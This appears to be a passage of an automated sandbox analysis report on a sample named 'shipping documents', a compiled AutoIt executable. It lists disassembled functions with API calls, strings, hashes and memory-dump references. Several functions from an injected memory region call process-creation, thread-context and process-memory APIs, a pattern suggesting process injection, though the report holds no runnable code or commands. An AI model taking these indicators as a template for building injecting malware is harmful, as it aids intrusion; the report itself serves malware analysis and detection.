Instruction ID: 0d399605db10294435184212ae88f70d7bb8dfc4b9580dda97845f5f47c0652f
Opcode Fuzzy Hash: 87a13fed3147563ddf7726333774a1b069d3b3a372fd06c3e762905888b62fd2
Instruction Fuzzy Hash: 47C13DB1D00219AADF61DF95CC85ADEB7BEEF45300F0040AAF609E7251EB709A848F65

Function 00653015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00653074
RegisterClassExW.USER32(00000030), ref: 0065309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006530AF
InitCommonControlsEx.COMCTL32(?), ref: 006530CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006530DC
LoadIconW.USER32(000000A9), ref: 006530F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00653101

Strings

+, xrefs: 0065305D
TaskbarCreated, xrefs: 006530A4
AutoIt v3 GUI, xrefs: 00653090
0, xrefs: 00653056

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: cc59587d490b6fe944e66a284d94e4d67d42316c75bbd87fdf15d3f1e28066e0
Instruction ID: c7add58d1c1064c2c1ce3f12b2f94c977761c42dea090a192c171685b2da43e6
Opcode Fuzzy Hash: cc59587d490b6fe944e66a284d94e4d67d42316c75bbd87fdf15d3f1e28066e0
Instruction Fuzzy Hash: 4C3138B1D41349AFDB009FA8EC88ADDBFF1FB09310F14816AE541E62A0D3BA4645CF95

Function 00653041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00653074
RegisterClassExW.USER32(00000030), ref: 0065309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006530AF
InitCommonControlsEx.COMCTL32(?), ref: 006530CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006530DC
LoadIconW.USER32(000000A9), ref: 006530F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00653101

Strings

+, xrefs: 0065305D
TaskbarCreated, xrefs: 006530A4
AutoIt v3 GUI, xrefs: 00653090
0, xrefs: 00653056

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 70e6a74b23f4cbb8927b15517a37bf051858e95cc94efb96db55881d349e8c19
Instruction ID: e29ef5f9e0caaa733bbcd2f036702a7eb1cf778c549fd207f3a8e6836bc36520
Opcode Fuzzy Hash: 70e6a74b23f4cbb8927b15517a37bf051858e95cc94efb96db55881d349e8c19
Instruction Fuzzy Hash: 7C21C4B1D12218AFDB00DFA8EC89BDDBBF5FB08700F00912AF911A62A0D7B54644CF95

Function 006571EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00654864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007162F8,?,006537C0,?), ref: 00654882

Part of subcall function 0067074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,006572C5), ref: 00670771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00657308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0068ECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0068ED32
RegCloseKey.ADVAPI32(?), ref: 0068ED70
_wcscat.LIBCMT ref: 0068EDC9

Strings

\Include\, xrefs: 006572C5
Include, xrefs: 0068ECE8, 0068ED29
Software\AutoIt v3\AutoIt, xrefs: 006572FE
\, xrefs: 0068EDEC

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 8c74ca28abaed07f53250affab3f2c7f4fc2fe80c005b76b9f756d0a00345a99
Instruction ID: b47cb5dfdc3f70b2bb1cfb7dadd6e51abf401a07bb7434819ae95631895a3bcb
Opcode Fuzzy Hash: 8c74ca28abaed07f53250affab3f2c7f4fc2fe80c005b76b9f756d0a00345a99
Instruction Fuzzy Hash: 87718F714093019EC318EF29EC9189BBBF9FF58750F40852EF845872A0EB759949CB69

Function 00653633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 006536D2
KillTimer.USER32(?,00000001), ref: 006536FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0065371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0065372A
CreatePopupMenu.USER32 ref: 0065373E
PostQuitMessage.USER32(00000000), ref: 0065375F

Strings

TaskbarCreated, xrefs: 00653725
%n, xrefs: 0068D2D1, 0068D31F

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%n
API String ID: 129472671-3795218793
Opcode ID: 7660fa9acb8d7ecb1fc35ef512ef356909cb8a7df0d1e1d03d0b00d8c9d0e052
Instruction ID: ac4dc275ba283e171c026e47a948e70e884dbe0d15b9a6353e23f77f51aa5fb2
Opcode Fuzzy Hash: 7660fa9acb8d7ecb1fc35ef512ef356909cb8a7df0d1e1d03d0b00d8c9d0e052
Instruction Fuzzy Hash: 074138B1600115ABDF106F28EC19BF937A7E705B82F14412DFD02C63E1DAB8AE499369

Function 00653A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00653A62
LoadCursorW.USER32(00000000,00007F00), ref: 00653A71
LoadIconW.USER32(00000063), ref: 00653A88
LoadIconW.USER32(000000A4), ref: 00653A9A
LoadIconW.USER32(000000A2), ref: 00653AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00653AD2
RegisterClassExW.USER32(?), ref: 00653B28

Part of subcall function 00653041: GetSysColorBrush.USER32(0000000F), ref: 00653074
Part of subcall function 00653041: RegisterClassExW.USER32(00000030), ref: 0065309E
Part of subcall function 00653041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006530AF
Part of subcall function 00653041: InitCommonControlsEx.COMCTL32(?), ref: 006530CC
Part of subcall function 00653041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006530DC
Part of subcall function 00653041: LoadIconW.USER32(000000A9), ref: 006530F2
Part of subcall function 00653041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00653101

Strings

#, xrefs: 00653B0D
0, xrefs: 00653B06
AutoIt v3, xrefs: 00653B17

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: c70216a447a40387bf03481a953616d00eb17bcd760887a8aca00be9bdb8548f
Instruction ID: 7bd482069a713890a0c1e7bfe4c4547c020e90d8fb1ca2969fa4d949901d1c28
Opcode Fuzzy Hash: c70216a447a40387bf03481a953616d00eb17bcd760887a8aca00be9bdb8548f
Instruction Fuzzy Hash: 7D211971E11304AFEB109FA8EC09BDD7BB5FB08711F00812AF904A62E0D7BA5654CF98

Function 00653778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

bq, xrefs: 0068D44E
/AutoIt3OutputDebug, xrefs: 006538A4
/AutoIt3ExecuteScript, xrefs: 006538CE
CMDLINERAW, xrefs: 0065380D
/AutoIt3ExecuteLine, xrefs: 006538B9
/ErrorStdOut, xrefs: 0065388F
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 006537C0
CMDLINE, xrefs: 00653834

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$bq
API String ID: 1825951767-1838696661
Opcode ID: d1bf5235f9a4d9ee024c7ba36973196e837402b0e44bccfd82ec931a98caefe8
Instruction ID: 107821af06818b5cbfe4b08f669cae18c5339917b4de14bcdd52c8697d70484e
Opcode Fuzzy Hash: d1bf5235f9a4d9ee024c7ba36973196e837402b0e44bccfd82ec931a98caefe8
Instruction Fuzzy Hash: 0AA16071C102299ACF44EBA4CC92AEEB7BABF14741F04452EF816B7291DF745A0DCB64

Function 0065F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006703A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006703D3
Part of subcall function 006703A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 006703DB
Part of subcall function 006703A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006703E6
Part of subcall function 006703A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006703F1
Part of subcall function 006703A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 006703F9
Part of subcall function 006703A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00670401

Part of subcall function 00666259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0065FA90), ref: 006662B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0065FB2D
OleInitialize.OLE32(00000000), ref: 0065FBAA
CloseHandle.KERNEL32(00000000), ref: 006949F2

Strings

<gq, xrefs: 0065FA90
cq, xrefs: 0065F94B
%n, xrefs: 0065F8F6, 0065F908, 0065FACE, 0065FBB1
\dq, xrefs: 0065F957

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <gq$\dq$%n$cq
API String ID: 1986988660-3293497968
Opcode ID: 9db400524927ee3dd1db9ffc6faa052f3104dba38470caeda813a66da3a642ca
Instruction ID: 8d48e1334b3332fdbac34f12ddaede0a4a7ef20f395efc2c2b3058253ab79df9
Opcode Fuzzy Hash: 9db400524927ee3dd1db9ffc6faa052f3104dba38470caeda813a66da3a642ca
Instruction Fuzzy Hash: AF81BAB09022808ED784EF6DE9456D57BEAEB48708711C17E9819C72E2EB3D8648CF1C

Function 03BA2610 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03BA26E1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03BA2907

Memory Dump Source

Source File: 00000000.00000002.2068540502.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ba0000_shipping documents.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction ID: 167ab9e30a7749e6b5329427fd4a5370c83b7a1e00b88661ef28cccc4e7b1646
Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction Fuzzy Hash: 04A13A74E04609EBDB14CFA8C894BEEB7B5FF48309F2485A9E505BB280D7759A40CF94

Function 006539E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00653A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00653A36
ShowWindow.USER32(00000000,?,?), ref: 00653A4A
ShowWindow.USER32(00000000,?,?), ref: 00653A53

Strings

AutoIt v3, xrefs: 00653A0D, 00653A12, 00653A13
edit, xrefs: 00653A30

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 1fe544dac224c871d743ee69ef8dfb7f9ea86c71995cab2d7bc62ea95f868755
Instruction ID: a46c156c71e14e1e8af801e16832fcb36562fe1292423fd224e34d29fb2aec1f
Opcode Fuzzy Hash: 1fe544dac224c871d743ee69ef8dfb7f9ea86c71995cab2d7bc62ea95f868755
Instruction Fuzzy Hash: 4CF03070A012907EEA30171B6C08EA73E7EE7C6F60B01C02AB900A21B0C1B94801CAB4

Function 03BA23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03BA22A0: Sleep.KERNELBASE(000001F4), ref: 03BA22B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03BA2500

Strings

S7NK6RPVUEACV8GQ9F2UG, xrefs: 03BA2563, 03BA2566

Memory Dump Source

Source File: 00000000.00000002.2068540502.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ba0000_shipping documents.jbxd

Similarity

API ID: CreateFileSleep
String ID: S7NK6RPVUEACV8GQ9F2UG
API String ID: 2694422964-1438934716
Opcode ID: c390ed588184b8498e55fa60167753b6c5672d3e9b92dc369ce518047eb98aed
Instruction ID: 3ec6d2287440c1f1d6060314074b40756ec617163a7958f97ea4d11b5680894c
Opcode Fuzzy Hash: c390ed588184b8498e55fa60167753b6c5672d3e9b92dc369ce518047eb98aed
Instruction Fuzzy Hash: 1C619130D08648DBEF11DBE8D854BEEBB79AF18304F044598E548BB2C0D7BA5B45CBA5

Function 0065410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0068D5EC

Part of subcall function 00657D2C: _memmove.LIBCMT ref: 00657D66

_memset.LIBCMT ref: 0065418D
_wcscpy.LIBCMT ref: 006541E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006541F1

Strings

Line: , xrefs: 0068D615

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: b8c5ec26ede90e329cbea311dcfa139b3af7b442f8b06c27cb58006c4cf0b21c
Instruction ID: 6d4f28add9c2e24d2b5752dc2547271d07dedd7ef2818ccaf1b43bb5358b1620
Opcode Fuzzy Hash: b8c5ec26ede90e329cbea311dcfa139b3af7b442f8b06c27cb58006c4cf0b21c
Instruction Fuzzy Hash: 1731E4714083049AD371EB64EC46BDB73EAAF44305F10851EF985921D1DF74968CC79B

Function 0067564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 006756AB
_memcpy_s.LIBCMT ref: 0067571D
__read_nolock.LIBCMT ref: 0067577B
__filbuf.LIBCMT ref: 0067579E
_memset.LIBCMT ref: 006757E2

Part of subcall function 00678D68: __getptd_noexit.LIBCMT ref: 00678D68

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: 957dd9ba06feb8edd37308a4c584365228a4ded106d319836ac5244d095deee1
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: 8D518530A00B05DBDB289F6988846AE77A7AF41320F64C7ADF82E962D0D7B09D518B45

Function 006569CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00654F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00654F6F

_free.LIBCMT ref: 0068E68C
_free.LIBCMT ref: 0068E6D3

Part of subcall function 00656BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00656D0D

Strings

Bad directive syntax error, xrefs: 0068E6BB
>>>AUTOIT SCRIPT<<<, xrefs: 0068E462

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: a2e144b2d5a6a2bbdd4795eb531c39e68d613a5234a340f4dcc9e5a890019df4
Instruction ID: 495e7bc29fc8241769d4c211f0fbbde0d14902eb54a580ce1abc001291b352c3
Opcode Fuzzy Hash: a2e144b2d5a6a2bbdd4795eb531c39e68d613a5234a340f4dcc9e5a890019df4
Instruction Fuzzy Hash: E991B071910219EFCF04EFA4C8919EDB7B6FF19310F04456EF816AB291EB31A949CB64

Function 006535B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006535A1,SwapMouseButtons,00000004,?), ref: 006535D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006535A1,SwapMouseButtons,00000004,?,?,?,?,00652754), ref: 006535F5
RegCloseKey.KERNELBASE(00000000,?,?,006535A1,SwapMouseButtons,00000004,?,?,?,?,00652754), ref: 00653617

Strings

Control Panel\Mouse, xrefs: 006535D2

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: e408efd18544ad542937ecbc7c56b75d3567b552332d764e02a19a301bfd28f7
Instruction ID: c74240182437a8558084735fcd9eb749679408b0506da973935421e6e5d774d0
Opcode Fuzzy Hash: e408efd18544ad542937ecbc7c56b75d3567b552332d764e02a19a301bfd28f7
Instruction Fuzzy Hash: 62115A71911228BFDB208F64DC40EEEB7BAEF04B81F00946AF805D7310D2719F549760

Function 03BA12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03BA1A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03BA1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03BA1B13

Memory Dump Source

Source File: 00000000.00000002.2068540502.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ba0000_shipping documents.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
Instruction ID: a74a7270063e6070334582d162251d9318b0baf9564b0fa50f7f8ff22ed5bf4c
Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
Instruction Fuzzy Hash: 98621E34A14A58DBEB24CFA8C840BDEB376EF58304F1091A9D10DEB390E7759E81CB59

Function 006B97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00655045: _fseek.LIBCMT ref: 0065505D

Part of subcall function 006B99BE: _wcscmp.LIBCMT ref: 006B9AAE
Part of subcall function 006B99BE: _wcscmp.LIBCMT ref: 006B9AC1

_free.LIBCMT ref: 006B992C
_free.LIBCMT ref: 006B9933
_free.LIBCMT ref: 006B999E

Part of subcall function 00672F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00679C64), ref: 00672FA9
Part of subcall function 00672F95: GetLastError.KERNEL32(00000000,?,00679C64), ref: 00672FBB

_free.LIBCMT ref: 006B99A6

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
